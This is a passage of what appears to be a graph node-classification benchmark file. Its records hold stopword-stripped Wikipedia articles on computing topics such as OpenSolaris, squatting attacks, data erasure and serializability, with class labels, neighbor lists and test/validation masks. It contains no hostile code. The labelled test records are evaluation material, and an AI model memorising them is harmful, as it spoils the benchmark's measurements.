compilation late binding may prevent forms static analysis needed integrated development environment ide example ide go definition feature may function late-bound call ide way know class call may refer modern ide easily solves especially object-oriented languages since late-bound method always specifies interface base class go definition leads find references used find implementations overrides similar problem possible lack typing information may prevent creation dependency graphs however programming methods abstract interfaces result problems modern ide create dependency graphs easily handles find references",
    "neighbors": [
      2323,
      9875,
      9497,
      10011,
      10013,
      8609,
      1448,
      5803,
      11574,
      10176,
      9665,
      10712,
      6500,
      6502,
      8041,
      7018,
      8554,
      10729,
      2804,
      8822,
      7292,
      11262,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 11362,
    "label": 1,
    "text": "Negative_database:negative database database security negative database database saves attributes associated certain entry negative database kind database contains huge amount data consisting simulating data anyone tries get access databases actual negative data sets retrieved even steal entire database example instead storing personal details store personal details members n't negative databases avoid inappropriate queries inferences also support allowable operations scenario desirable database support allowable queries protecting privacy individual records say inspection insider collection negative data referred negative sousveillance",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 11363,
    "label": 2,
    "text": "OpenSolaris:opensolaris opensolaris discontinued open source computer operating system based solaris created sun microsystems also name project initiated sun build developer user community around software acquisition sun microsystems 2010 oracle decided discontinue open development core software replaced opensolaris distribution model proprietary solaris express prior oracle moving core development behind closed doors group former opensolaris developers decided fork core software name openindiana openindiana project part illumos foundation aims continue development distribution opensolaris codebase since many illumos distributions available use continuing development open offering support opensolaris descendant unix system v release 4 svr4 code base developed sun late 1980s version system v variant unix available open source opensolaris developed combination several software consolidations open sourced subsequent solaris 10 includes variety free software including popular desktop server software friday august 13 2010 details started emerge relating discontinuation opensolaris project pending release new closed-source proprietary version solaris solaris 11 opensolaris based solaris originally released sun 1991 solaris version unix system v release 4 svr4 jointly developed sun merge features several existing unix systems licensed sun novell replace sunos planning opensolaris started early 2004 pilot program formed september 2004 18 non-sun community members ran 9 months growing 145 external participants sun submitted cddl common development distribution license osi approved january 14 2005 first part solaris code base open sourced solaris dynamic tracing facility commonly known dtrace tool aids analysis debugging tuning applications systems dtrace released cddl january 25 2005 newly launched opensolaris.org website bulk solaris system code released june 14 2005 remains system code open sourced available pre-compiled binary files direct newly fledged project community advisory board announced april 4 2005 two elected pilot community two employees appointed sun one appointed broader free software community sun members roy fielding al hopper rich teer casper dik simon phipps february 10 2006 sun approved opensolaris charter reestablished body independent opensolaris governing board task creating governance document constitution organization given ogb three invited members stephen hahn keith wesolowski developers sun solaris organization ben rockwood prominent opensolaris community member former next-generation solaris os version development sun eventually succeed solaris 10 codenamed 'nevada derived opensolaris codebase new code pulled new opensolaris 'nevada snapshot builds sun microsystems control bi-weekly snapshots solaris nevada codename next-generation solaris os eventually succeed solaris 10 new code pulled new opensolaris preview snapshots available genunix.org stable releases opensolaris based nevada builds initially sun solaris express program provided distribution based opensolaris code combination software found solaris releases first independent distribution released june 17 2005 many others emerged since march 19 2007 sun announced hired ian murdock founder debian head project indiana effort produce complete opensolaris distribution gnome userland tools gnu plus network-based package management system new distribution planned refresh user experience would become successor solaris express basis future releases solaris may 5 2008 opensolaris 2008.05 released format could booted live cd installed directly uses gnome desktop environment primary user interface later opensolaris 2008.11 release included gui zfs snapshotting capabilities known time slider provides functionality similar macos time machine december 2008 sun microsystems toshiba america information systems announced plans distribute toshiba laptops pre-installed opensolaris april 1 2009 tecra m10 portégé r600 came preinstalled opensolaris 2008.11 release several supplemental software packages june 1 2009 opensolaris 2009.06 released support sparc platform january 6 2010 announced solaris express program would closed opensolaris binary release scheduled released march 26 2010 opensolaris 2010.03 release never appeared august 13 2010 oracle rumored discontinued opensolaris binary distribution focus solaris express binary distribution program source code would continue accepted community oracle source code would continue released open source oracle code releases would occur binary releases internal email released opensolaris kernel developer unconfirmed oracle post confirming leak posted opensolaris forums august 13 2010 upstream contributions continue new oracle web site downstream source code publishing continue binary distribution continue old solaris express model release source code occur binary cuts binary cuts become less frequent september 14 2010 openindiana formally launched jisc centre london openindiana fork technical sense continuation opensolaris spirit project intends deliver system v family operating system binary-compatible oracle products solaris 11 solaris 11 express however rather based around os/net consolidation like opensolaris openindiana became distribution based illumos first release still based around os/net project uses ips package management system opensolaris november 12 2010 final build opensolaris 134b published oracle /release repository serve upgrade path solaris 11 express oracle solaris 11 express 2010.11 preview solaris 11 first release post-opensolaris distribution oracle released november 15 2010 opensolaris offered development unstable production stable releases opensolaris installed cd-rom usb drives network automated installer cd usb network install images made available types releases opensolaris uses network-aware package management system called image packaging system also known pkg 5 add remove manage installed software update newer releases packages development releases opensolaris published oracle typically every two weeks /dev repository production releases use /release repository receive updates next production release sun customers paid support contracts access updates production releases paid support production releases allows access security updates bug fixes offered sun /support repository pkg.sun.com hardware compatibility list hcl opensolaris consulted choosing hardware opensolaris deployment extensive opensolaris administration usage development documentation available online including community-contributed information sun released solaris source code common development distribution license cddl based mozilla public license mpl version 1.1 cddl approved open source license open source initiative osi january 2005 files licensed cddl combined files licensed licenses whether open source proprietary sun announcement java release gnu general public license gpl jonathan schwartz rich green hinted possibility releasing solaris gpl green saying certainly averse relicensing gpl schwartz pressed jokingly green said sun would take close look january 2007 eweek reported anonymous sources sun told opensolaris would dual-licensed cddl gplv3 green responded blog next day article incorrect saying although sun giving serious consideration dual-licensing arrangement would subject agreement rest opensolaris community first annual opensolaris developer conference abbreviated osdevcon organized german unix user group guug took place february 27 march 2 2007 freie universität berlin germany 2008 osdevcon joint effort guug czech opensolaris user group czosug look place june 25–27 2008 prague czech republic 2009 osdevcon look place october 27–30 2009 dresden germany 2007 sun microsystems organized first opensolaris developer summit held weekend october 13 2007 university california santa cruz united states 2008 opensolaris developer summit returned ucsc may 2–3 2008 took place immediately prior launch sun new opensolaris distribution may 5 2008 communityone conference san francisco california first opensolaris storage summit organized sun held september 21 2008 preceding snia storage developer conference sdc santa clara california second opensolaris storage summit preceded usenix conference file storage technologies fast february 23 2009 san francisco united states november 3 2009 solaris/opensolaris security summit held sun inner harbor area baltimore maryland preceding large installation system administration conference lisa notable derivatives include",
    "neighbors": [
      9731,
      5129,
      1038,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      10789,
      5158,
      5677,
      7217,
      9784,
      10809,
      576,
      1600,
      7234,
      8262,
      593,
      597,
      10327,
      10333,
      2656,
      97,
      10851,
      8298,
      5231,
      5233,
      7285,
      9333,
      631,
      2168,
      633,
      5240,
      1147,
      9335,
      3197,
      1150,
      9343,
      2179,
      2180,
      6787,
      10883,
      5256,
      4235,
      6797,
      4241,
      2710,
      9366,
      6296,
      7325,
      9887,
      5280,
      3241,
      1707,
      2731,
      3247,
      3248,
      6322,
      6837,
      6338,
      708,
      8388,
      10436,
      2252,
      9932,
      5840,
      3285,
      7382,
      5335,
      8410,
      6369,
      2786,
      6371,
      9955,
      1253,
      5356,
      9964,
      10478,
      5872,
      11506,
      5363,
      8439,
      4857,
      4858,
      2811,
      3328,
      10499,
      5380,
      1801,
      1804,
      6412,
      11023,
      273,
      1809,
      11539,
      1813,
      5397,
      1304,
      8476,
      10016,
      8994,
      1316,
      4902,
      6438,
      2345,
      6445,
      7983,
      823,
      2871,
      4409,
      7483,
      11075,
      4423,
      8007,
      2378,
      2895,
      5457,
      11601,
      2395,
      3931,
      8539,
      10590,
      5471,
      4960,
      8551,
      11626,
      366,
      7022,
      5492,
      1399,
      2424,
      11129,
      381,
      3976,
      7049,
      394,
      3978,
      8077,
      1422,
      7057,
      11667,
      2967,
      8092,
      414,
      3487,
      7072,
      6049,
      421,
      11174,
      5546,
      8621,
      11184,
      2995,
      9141,
      10170,
      6075,
      5054,
      6078,
      7104,
      9151,
      9665,
      1480,
      8136,
      5067,
      463,
      6095,
      8661,
      5078,
      10200,
      6617,
      8671,
      7148,
      6128,
      7666,
      5619,
      8179,
      6133,
      10235,
      8700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11364,
    "label": 4,
    "text": "Squatting_attack:squatting attack squatting attack computer science kind dos attack program interferes another program use shared synchronization objects unwanted unexpected way attack known microsoft windows operating system offers named objects interprocess synchronization mechanism named objects process may open synchronization object shared resource specifying name subsequent processes may use name open resource way synchronize first process squatting attack possible legitimate program enforce tight security rules resources processes arbitrary security contexts may gain access ultimately take control system consider example antivirus software installed microsoft windows machine solution two pieces service monitors scans every file opened manual scanner scans file system user requests normal conditions service scan system occasionally however user requests manual scan service must stop temporarily let manual scanner work otherwise every file would scanned twice manual scanner service solve problem vendor chooses implement event based synchronization mechanism service keeps named event opened checks whenever file opened event unset file scanned otherwise ignored manual scanner operate opens named event sets scanning disabling service scans file system resets event back finished design prone squatting attack malicious program set named event disable service completely",
    "neighbors": [
      9762,
      2213,
      2409,
      10828,
      6797
    ],
    "mask": "None"
  },
  {
    "node_id": 11365,
    "label": 4,
    "text": "XARA:xara xara acronym unauthorized cross-app resource access describes category zero-day vulnerabilities computer software systems academic research paper entitled unauthorized cross-app resource access mac os x ios published 26 may 2015 team researchers indiana university tsinghua university peking university chinese academy sciences georgia institute technology paper widely released public 16 june 2015 paper identifies number separate categories zero day threats applications stored passwords potentially exploited malware ios devices os x paper also discloses existence similar vulnerabilities android devices xara attack vector violates principles computer security sandbox",
    "neighbors": [
      9762,
      9063,
      3944,
      11400,
      4972,
      3473,
      7515,
      2428
    ],
    "mask": "Test"
  },
  {
    "node_id": 11366,
    "label": 4,
    "text": "Backup_and_disaster_recovery_appliance:backup disaster recovery appliance backup disaster recovery appliance also bdr appliance bdr specialized backup appliance includes backup software backup storage hypervisor support local disaster recovery appliance",
    "neighbors": [
      9025,
      3366
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11367,
    "label": 3,
    "text": "Model_Driven_Interoperability:model driven interoperability model driven interoperability mdi methodological framework provides conceptual technical support make interoperable enterprises using ontologies semantic annotations following model driven development mdd principles initial idea works mdi application model-driven methods techniques solving interoperability problems business level data level three main ideas model driven interoperability mdi approach mdi initiated 2004 beginning two important research projects projects supported european commission two projects worked definition methodological framework application mdi concrete cases mdi framework within interop defined reference model proposed mdi approach shows different kinds models possible perform different levels abstraction successive model transformations needed carry different levels abstraction needed order make possible model transformations reducing gap existing enterprise models code level definition several levels based model driven architecture mda defines three levels abstraction cim pim psm moreover introduced partition cim level two sub-levels order reduce gap cim pim levels interoperability model also defined different levels abstraction proposed one example reference model mdi see next figure picture shows proposed levels different kind models performed grai top cim level uml levels final objective making interoperable two esa franchisor erp franchisee crm model driven interoperability method mdi method model-driven method used two enterprises need interoperate code level also enterprise modelling level ontological support final aim improving performances mdi method proposed solve interoperability problems like name indicates based mda approach also following principles applied definition method next picture show main features mdi method green areas give estimated effort related phase workflow mdi framework athena provides guidance mdd applied address interoperability framework structured three main integration areas reference model conceptual integration developed mdd point view focusing enterprise applications software system according mda computation independent model cim corresponds view defined computation independent viewpoint describes business context business requirements software system platform independent model pim corresponds view defined platform independent viewpoint describes software specifications independent execution platforms platform specific model psm corresponds view defined platform specific viewpoint describes realisation software systems technical integration reference model promotes use service-oriented solutions software system generally system provide set services required businesses users enterprise reference model applicative integration developed order emphasise dependencies different models views achieve interoperability model transformation one key approaches used support mdi method approach used horizontal vertical dimension reference model mdi model transformations performed based generic transformation architecture following services verification consistency models support automatic mapping discovery among heterogeneous models definition semantic preserving transformation support mdi tackle vertical horizontal issues vertical issues semantic support aiming horizontal issues semantic support aiming",
    "neighbors": [
      2948,
      5005,
      9926,
      4591
    ],
    "mask": "Test"
  },
  {
    "node_id": 11368,
    "label": 4,
    "text": "Data_erasure:data erasure data erasure sometimes referred data clearing data wiping data destruction software-based method overwriting data aims completely destroy electronic data residing hard disk drive digital media using zeros ones overwrite data onto sectors device overwriting data storage device data rendered unrecoverable achieves data sanitization ideally software designed data erasure permanent data erasure goes beyond basic file deletion commands remove direct pointers data disk sectors make data recovery possible common software tools unlike degaussing physical destruction render storage media unusable data erasure removes information leaving disk operable new flash memory-based media implementations solid-state drives usb flash drives cause data erasure techniques fail allowing remnant data recoverable software-based overwriting uses software application write stream zeros ones meaningless pseudorandom data onto sectors hard disk drive key differentiators data erasure overwriting methods leave data intact raise risk data breach identity theft failure achieve regulatory compliance many data eradication programs also provide multiple overwrites support recognized government industry standards though single-pass overwrite widely considered sufficient modern hard disk drives good software provide verification data removal necessary meeting certain standards protect data lost stolen media data erasure applications remotely destroy data password incorrectly entered data erasure tools also target specific data disk routine erasure providing hacking protection method less time-consuming software encryption hardware/firmware encryption built drive integrated controllers popular solution degradation performance encryption place data erasure acts complement crypto-shredding practice 'deleting data deleting overwriting encryption keys presently dedicated hardware/firmware encryption solutions perform 256-bit full aes encryption faster drive electronics write data drives capability known self-encrypting drives seds present modern enterprise-level laptops increasingly used enterprise protect data changing encryption key renders inaccessible data stored sed easy fast method achieving 100 data erasure theft sed results physical asset loss stored data inaccessible without decryption key stored sed assuming effective attacks aes implementation drive hardware information technology assets commonly hold large volumes confidential data social security numbers credit card numbers bank details medical history classified information often stored computer hard drives servers inadvertently intentionally make way onto media printers usb flash zip jaz rev drives increased storage sensitive data combined rapid technological change shorter lifespan assets driven need permanent data erasure electronic devices retired refurbished also compromised networks laptop theft loss well portable media increasingly common sources data breaches data erasure occur disk retired lost organization user faces possibility data stolen compromised leading identity theft loss corporate reputation threats regulatory compliance financial impacts companies spend large amounts money make sure data erased discard disks high-profile incidents data theft include strict industry standards government regulations place force organizations mitigate risk unauthorized exposure confidential corporate government data regulations united states include hipaa health insurance portability accountability act facta fair accurate credit transactions act 2003 glb gramm-leach bliley sarbanes-oxley act sox payment card industry data security standards pci dss data protection act united kingdom failure comply result fines damage company reputation well civil criminal liability data erasure offers alternative physical destruction degaussing secure removal disk data physical destruction degaussing destroy digital media requiring disposal contributing electronic waste negatively impacting carbon footprint individuals companies hard drives nearly 100 recyclable collected charge variety hard drive recyclers sanitized data erasure may work completely flash based media solid state drives usb flash drives devices store remnant data inaccessible erasure technique data retrieved individual flash memory chips inside device data erasure overwriting works hard drives functioning writing sectors bad sectors usually overwritten may contain recoverable information bad sectors however may invisible host system thus erasing software disk encryption use prevents problem software-driven data erasure could also compromised malicious code software-based data erasure uses disk accessible application write combination ones zeroes alpha numeric character also known mask onto hard disk drive sector level security using software data destruction tools increased dramatically pre-testing hard drives sector abnormalities ensuring drive 100 working order number wipes become obsolete recent inclusion verify pass scans sectors disk checks character i.e 1 pass aa fill every writable sector hard disk makes 1 pass unnecessary certainly damaging act especially drives passed 1tb mark many overwriting programs capable complete data erasure offer full security destroying data areas hard drive disk overwriting programs access entire hard drive including hidden/locked areas like host protected area hpa device configuration overlay dco remapped sectors perform incomplete erasure leaving data intact accessing entire hard drive data erasure eliminates risk data remanence data erasure also bypass operating system os overwriting programs operate os always perform complete erasure modify contents hard drive actively use os many data erasure programs like dban provided bootable format run live cd necessary software erase disk data erasure deployed network target multiple pcs rather erase one sequentially contrast dos-based overwriting programs may detect network hardware linux-based data erasure software supports high-end server storage area network san environments hardware support serial ata serial attached scsi sas fibre channel disks remapped sectors operates directly sector sizes 520 524 528 removing need first reformat back 512 sector size winpe overtaken linux environment choice since drivers added little effort also helps data destruction tablets handheld devices require pure uefi environments without hardware nic installed and/or lacking uefi network stack support many government industry standards exist software-based overwriting removes data key factor meeting standards number times data overwritten also standards require method verify data removed entire hard drive view overwrite pattern complete data erasure account hidden areas typically dco hpa remapped sectors 1995 edition national industrial security program operating manual dod 5220.22-m permitted use overwriting techniques sanitize types media writing addressable locations character complement random character provision removed 2001 change manual never permitted top secret media still listed technique many providers data erasure software data erasure software provide user validation certificate indicating overwriting procedure completed properly data erasure software also comply requirements erase hidden areas provide defects log list list bad sectors could overwritten data sometimes recovered broken hard drive however platters hard drive damaged drilling hole drive platters inside data theoretically recovered bit-by-bit analysis platter advanced forensic technology data floppy disks sometimes recovered forensic analysis even disks overwritten zeros random zeros ones case modern hard drives e-waste presents potential security threat individuals exporting countries hard drives properly erased computer disposed reopened exposing sensitive information credit card numbers private financial data account information records online transactions accessed willing individuals organized criminals ghana commonly search drives information use local scams government contracts discovered hard drives found agbogbloshie multimillion-dollar agreements united states security institutions defense intelligence agency dia transportation security administration homeland security resurfaced agbogbloshie",
    "neighbors": [
      3841,
      3972,
      5125,
      8074,
      5133,
      5391,
      9086,
      8471,
      3225,
      7579,
      9499,
      1440,
      1315,
      8997,
      3880,
      3114,
      3629,
      7983,
      11695,
      7090,
      4659,
      9910,
      823,
      4408,
      831,
      3009,
      1475,
      7369,
      7887,
      1873,
      10195,
      8283,
      4956,
      6494,
      1251,
      2534,
      232,
      10600,
      3315,
      3572,
      11251,
      10872,
      4348,
      4221,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 11369,
    "label": 1,
    "text": "ENI_number:eni number eni number european number identification european vessel identification number registration ships capable navigating inland european waters unique eight-digit identifier attached hull entire lifetime independent vessel current name flag eni introduced inland transport committee united nations economic commission europe meeting 11–13 october 2006 geneva based rhine vessel certification system previously used ships navigating rhine comparable imo ship identification number eni number consists eight arabic numerals first three digits identify competent authority number assigned see list prefixes last five digits serial number ships vessel number accordance rhine inspection rules receive eni beginning 0 followed seven digit rhine number vessel issued imo number may receive eni number appropriate certifications inland water travel eni begin 9 followed seven digit imo number eni number transmitted inland-automatic identification system transponders european vessels required carry eni number april 2007 vessel must eni operates inland waterways meets following criteria length greater volume tug push boat operates qualifying vessel passenger ship floating installation/equipment vessel issued eni number must displayed sides stern vessel",
    "neighbors": [
      676,
      4413
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11370,
    "label": 9,
    "text": "Installer_(programming_language):installer programming language installer scripting language developed commodore international amigaos first released version 2.1 1992 grammar based lisp programming language compatible re-implementation named installerlg actively developed october 2018 example developer guide n't want write scripts line line may use installergen tool",
    "neighbors": [
      139,
      5264,
      2193,
      9236,
      3233,
      9249,
      8618,
      6062,
      432,
      8369,
      8115,
      6075,
      11076,
      10570,
      5709,
      1742,
      850,
      4564,
      4309,
      6233,
      5729,
      6502,
      5736,
      5743,
      11123,
      9848
    ],
    "mask": "Test"
  },
  {
    "node_id": 11371,
    "label": 8,
    "text": "CodeCharge_Studio:codecharge studio codecharge studio rapid application development rad integrated development environment ide creating database-driven web applications code generator templating engine separates presentation layer coding layer aim allowing designers programmers work cohesively web application model-view-controller design pattern codecharge first product released yes software inc. two years development codecharge utilizes point-and-click wizards creating record search forms grids editable grids without need programming databases supports include mysql ms sql server ms access postgresql oracle well database supports web connectivity codecharge export code major programing languages asp.net asp java coldfusion php perl codecharge employs interactive user interface ui designed creation web applications generating code codecharge automatically structures code using naming conventions comments describe code purpose moreover codecharge keeps application separate code generates projects may converted language time without additional programming codecharge-generated project routed web site everything routed example index.asp rather every page accessible reference name url listed technologies used application ready running application uses microsoft .net 2 framework also install .net 3.5 framework detected host computer 2003 regarding original version codecharge studio arbi arzoumani php architect wrote kevin yank sitepoint tech times impressed many ways experienced developers could draw added power software instead limited case rad tools web development review codecharge studio 2.0 troy dreier wrote intranet journal codecharge studio allows web application developers shave literally months development times codecharge studio 3.0 received rating 3.5 5 peter b. macintyre php|architect",
    "neighbors": [
      8644,
      8582,
      5677,
      6797,
      7983,
      9808,
      5048,
      11357
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11372,
    "label": 7,
    "text": "Dropbox_Paper:dropbox paper dropbox paper simply paper collaborative document-editing service developed dropbox originating company acquisition document collaboration company hackpad april 2014 dropbox paper officially announced october 2015 launched january 2017 offers web application well mobile apps android ios dropbox paper described official announcement post flexible workspace brings people ideas together paper teams create review revise manage organize—all shared documents reception dropbox paper mixed critics praised collaboration functionality including content available immediately ability mention specific collaborators assign tasks write comments well editing attribution revision history received particular praise support rich media variety sources one reviewer noting paper support rich media exceeds capabilities competitors however criticized lack formatting options editing features user interface liked minimal reviewers cited lack fixed formatting bar missing features present competitors products making dropbox paper seem like light tool dropbox acquired document collaboration company hackpad april 2014 year later dropbox launched dropbox notes note-taking product beta testing phase dropbox paper officially announced october 15 2015 followed open beta release mobile android ios apps august 2016 dropbox paper officially released january 30 2017 comparison dropbox paper evernote pc world michael ansaldo wrote emphasis document creation might expect formatting front center dropbox paper case ansaldo noted lack fixed formatting toolbar 'd find evernote word processor like google docs microsoft word instead text editor appears floating ribbon highlight selected text formatting options available emphasis bolding strikethrough bulleted numbered lists h1 h2 tags users also add links convert text checklists add comments ansaldo wrote evernote dropbox paper make easy add images document also noted dropbox paper n't support image editing paper supports rich media users add rich content document pasting link file addition dropbox paper supports media variety popular services including youtube spotify vimeo soundcloud facebook google productivity suite file appears delete link cleaner display start working people paper allows invite people via email within document sharing options view link anyone link invited person action permissions edit comment regarding collaboration ansaldo wrote creative collaboration paper ’ marquee feature provides variety ways work effectively others real time users make content immediately visible accessible specific collaborator mentions also use mentions create assign task lists within document paper also boasts essential collaboration tools including comments editing attribution revision history writing techradar john brandon wrote dropbox paper might 'light tool without extensive templates microsoft office integration apps zoho suite work well dropbox storage service popular office workers days kyle wiggers digital trends wrote paper minimizing distractions interface quite literally big blank canvas tap agenda organize notes title create to-do lists even basic formatting tools obscured view noting paper floating box words phrases highlighted cursor wiggers stated paper to-do organizer well suited purpose thanks bevy labor-saving conveniences highlighting paper supports media to-do note-taking counterparts praised collaboration tools writing extensive 'd hope citing invitation system permission controls lists changes revision history comment chat support perhaps best ability assign tasks mention business insider alex heath praised paper interface super clean friendly write n't feel overwhelmed formatting options criticized available features writing google docs much full-featured formatting department paper catching wants par competition writing verge casey newton praised paper handling rich media complimenting great added imagine creative types work teams appreciate rich media embedded documents 're working rather series infinite tabs",
    "neighbors": [
      803,
      9347,
      3462,
      488,
      3690,
      3691,
      4623,
      1817,
      11291,
      2046
    ],
    "mask": "None"
  },
  {
    "node_id": 11373,
    "label": 3,
    "text": "Mr._Do!:mr. object mr score many points possible digging tunnels ground collecting cherries title character mr. circus clown—except original japanese version game snowman constantly chased red monsters called creeps player loses life mr. caught one game last life lost cherries distributed throughout level groups eight 500 bonus points awarded mr. collects eight cherries row without stopping level complete either cherries removed creeps destroyed extra spelled diamond found mr. defeat creeps hitting bouncing power ball dropping large apples power ball bouncing toward creep mr. defenseless ball bounces area creeps hit behind fallen apple mr. use retrieved power ball hits creep reforms mr. hands delay increases use mr. creeps push apple edge vertical tunnel crush one creeps apple falls height breaks disappears mr. also crushed falling apple causing loss life occasionally creeps transform briefly powerful multicolored monsters tunnel ground one digs cherry leaves fewer cherries fewer points mr. collect digs apple often crushes creeps and/or mr. time score passes certain threshold play 5000 points letter word extra appears playfield alphamonster player defeat defeated monster way creep defeating alphamonster awards letter player collecting five letters word completes level goes cut scene playing theme astro boy awards player extra life alphamonsters attempt eat apples encounter makes difficult impossible crush creeps spawn center screen appeared generator turn food item picking scores bonus points freezes creeps calls alphamonster three large blue monsters latter eat apples well creeps stay frozen still deadly player either defeats three blue monsters defeats alphamonster case remaining blue monsters turned apples loses life completes stage rarely dropping apple reveal diamond collected within 15 seconds completes level awards bonus credit player well 8000 points allowing play free game feature relatively uncommon among arcade video games though standard feature many pinball machines mr ported atari 2600 atari 8-bit computers colecovision apple ii msx tomy tutor commodore 64 handheld lcd version released tomy 1983 colecovision adaptation alphamonster sidekicks unable eat apples making easier crush blue monsters eat shrubbery cherries also alphamonster letter already acquired dinosaur monsters freeze seconds release famicom tsūshin awarded super famicom version game 25 40 four reviewers electronic gaming monthly gave 4.875 10 dan hsu felt mr fun gameplay criticized lack enhancements decade old game recommended players get released significantly less normal retail price snes cartridge later feature 16-bit games reported contrary hopes game priced 50 mr followed three sequels mr. castle 1983 also known mr. vs. unicorns mr. wild ride run run 1984 expanded 99-level version mr developed arcades electrocoin 1989 mr adapted nintendo game boy super famicom/snes providing new gameplay features rebranded adaptation game released game boy color 1999 titled quest fantasy challenge holy magic century europe developed imagineer published sunsoft north america virgin interactive europe branded quest series game instead mr arcade version debuted wii virtual console japan april 27 2010.virtual console releases april 2010",
    "neighbors": [
      1984,
      9006,
      1776,
      9110,
      8151
    ],
    "mask": "Test"
  },
  {
    "node_id": 11374,
    "label": 3,
    "text": "Actel_SmartFusion:actel smartfusion smartfusion family microcontrollers integrated fpga actel device includes arm cortex-m3 hard processor core 512kb flash 64kb ram analog peripherals multi-channel adc dacs addition flash-based fpga fabric actel also sells two development boards include smartfusion chip one smartfusion evaluation kit low cost board smartfusion a2f200 sold 99 another smartfusion development kit fully featured board smartfusion a2f500 sold 999 amount documentation arm chips daunting especially newcomers documentation microcontrollers past decades would easily inclusive single document chips evolved documentation grown total documentation especially hard grasp arm chips since consists documents ic manufacturer actel documents cpu core vendor arm holdings typical top-down documentation tree manufacturer website manufacturer marketing slides manufacturer datasheet exact physical chip manufacturer detailed reference manual describes common peripherals aspects physical chip family arm core generic user guide arm core technical reference manual arm architecture reference manual describes instruction set actel additional documents evaluation board user manuals application notes getting started guides software library documents errata see external links section links official stm32 arm documents",
    "neighbors": [
      7170,
      11395,
      3467,
      10767,
      8720,
      1170,
      7445,
      666,
      5786,
      4508,
      9371,
      4773,
      38,
      9638,
      682,
      4139,
      2862,
      3886,
      2224,
      11054,
      11314,
      11447,
      9913,
      8253,
      8383,
      10945,
      7234,
      7235,
      9155,
      9928,
      2635,
      5963,
      9163,
      6607,
      7631,
      2517,
      4821,
      9685,
      4569,
      2524,
      6495,
      1377,
      2788,
      7269,
      3050,
      9964,
      6001,
      7281,
      8700,
      2814
    ],
    "mask": "None"
  },
  {
    "node_id": 11375,
    "label": 7,
    "text": "Agiloft:agiloft agiloft inc. technology company specializing business process management software redwood city california originally founded october 1990 integral solutions corporation colin earl agiloft started integral solutions corporation founded colin earl 1990 company worked development projects corporations developing software 1996 called supportwizard supportwizard designed help desk application 1999 officially supported mysql integral solutions continued build application adding call center crm functionality time company known name supportwizard software 2003 announced new revision software operating j2ee framework called enterprise wizard 2007 company offered platform version software called saaswizard users could automate business actions customization development continued enterprisewizard application operating top platform allowing users customize program web interface colin earl changed business software name agiloft 2012 2017 earl spoke proposed h1-b reforms stated one workers likelihood getting visa renewed return china agiloft low-code development platform prebuilt modules focus contract management service management platform configured via web-browser dropdown menus drag drop tools configure functions build new applications contract management portion software allows automation creation workflow renewal contracts used healthcare field software pc magazine editor choice award several years",
    "neighbors": [
      3560,
      4194,
      7022
    ],
    "mask": "None"
  },
  {
    "node_id": 11376,
    "label": 8,
    "text": "Unicorn_(web_server):unicorn web server unicorn rack http server serve ruby web applications unix environment optimised used nginx based mongrel 1.1.5 unicorn uses master/worker architecture master process forks worker processes control application runs single thread unicorn considered “ one popular servers rails ” twitter starts test unicorn 2010 server shipped discourse system administration expert sam saffron noted unicorn reliable reaps unresponsive workers gitlab also uses unicorn unicorn inspired projects like gunicorn fork run python applications 2018 projects tend favour puma heroku hosting provider recommends since 2015 migrate unicorn puma.. deliveroo published benchmark comparing two servers concluded “ puma performs better unicorn tests either heavily io-bound interleaved io cpu work ” unicorn still slightly better performing pure cpu situations",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      9245,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      8495,
      10800,
      11439,
      6714,
      10622,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      1250,
      865,
      2404,
      4837,
      6379,
      5612,
      9580,
      2287,
      8691,
      10611,
      11386,
      3966
    ],
    "mask": "None"
  },
  {
    "node_id": 11377,
    "label": 1,
    "text": "Global_serializability:global serializability concurrency control databases transaction processing transaction management transactional distributed applications global serializability modular serializability property global schedule transactions global schedule unified schedule individual database transactional object schedules multidatabase environment e.g. federated database complying global serializability means global schedule serializable serializability property component database module serializable schedule well words collection serializable components provides overall system serializability usually incorrect need correctness across databases multidatabase systems makes global serializability major goal global concurrency control modular concurrency control proliferation internet cloud computing grid computing small portable powerful computing devices e.g. smartphones well increase systems management sophistication need atomic distributed transactions thus effective global serializability techniques ensure correctness among distributed transactional applications seems increase federated database system loosely defined multidatabase system typically distributed communication network transactions span multiple possibly distributed databases enforcing global serializability system different databases may use different types concurrency control problematic even every local schedule single database serializable global schedule whole system necessarily serializable massive communication exchanges conflict information needed databases reach conflict serializability globally would lead unacceptable performance primarily due computer communication latency achieving global serializability effectively different types concurrency control open several years commitment ordering commit ordering co serializability technique publicly introduced 1991 yoav raz digital equipment corporation dec provides effective general solution global conflict serializability across collection database systems transactional objects possibly different concurrency control mechanisms co need distribution conflict information rather utilizes already needed unmodified atomic commitment protocol messages without communication databases also allows optimistic non-blocking implementations co generalizes strong strict two phase locking ss2pl conjunction two-phase commit 2pc protocol de facto standard achieving global serializability across ss2pl based database systems result co compliant database systems different concurrency control types transparently join existing ss2pl based solutions global serializability applies also multiple transactional object systems use atomic transactions need global serializability correctness see examples nowadays need smaller database systems origin atomic transactions significant aspects co make uniquely effective general solution global serializability following aspects except first two also possessed popular ss2pl constrained blocking special case co inherits many co qualities difficulties described translate following problem lack appropriate solution global serializability problem driven researchers look alternatives serializability correctness criterion multidatabase environment e.g. see relaxing global serializability problem characterized difficult open following two quotations demonstrate mindset end year 1991 similar quotations numerous articles commitment ordering publicly introduced may 1991 see provides efficient elegant general solution practical theoretical points view global serializability problem across database systems possibly different concurrency control mechanisms provides conflict serializability negative effect availability worse performance de facto standard global serializability co special case strong strict two-phase locking ss2pl requires knowledge neither local global transactions commitment ordering solution comprises effective integration autonomous database management systems possibly different concurrency control mechanisms local global transactions execute parallel without restricting read write operation either local global transactions without compromising systems 